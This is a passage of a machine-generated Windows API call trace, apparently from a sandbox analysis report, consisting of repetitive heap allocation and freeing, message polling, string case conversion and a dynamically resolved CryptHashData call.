hHeap=0x25c0000) returned 1 [0251.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b18e8 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.781] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.781] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.781] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.782] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.782] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0251.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x34aa790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.786] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.786] CryptHashData (hHash=0xaa5860, pbData=0x24b1738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.791] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.792] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.792] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0251.792] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.792] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.793] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.793] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.793] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.793] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.793] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 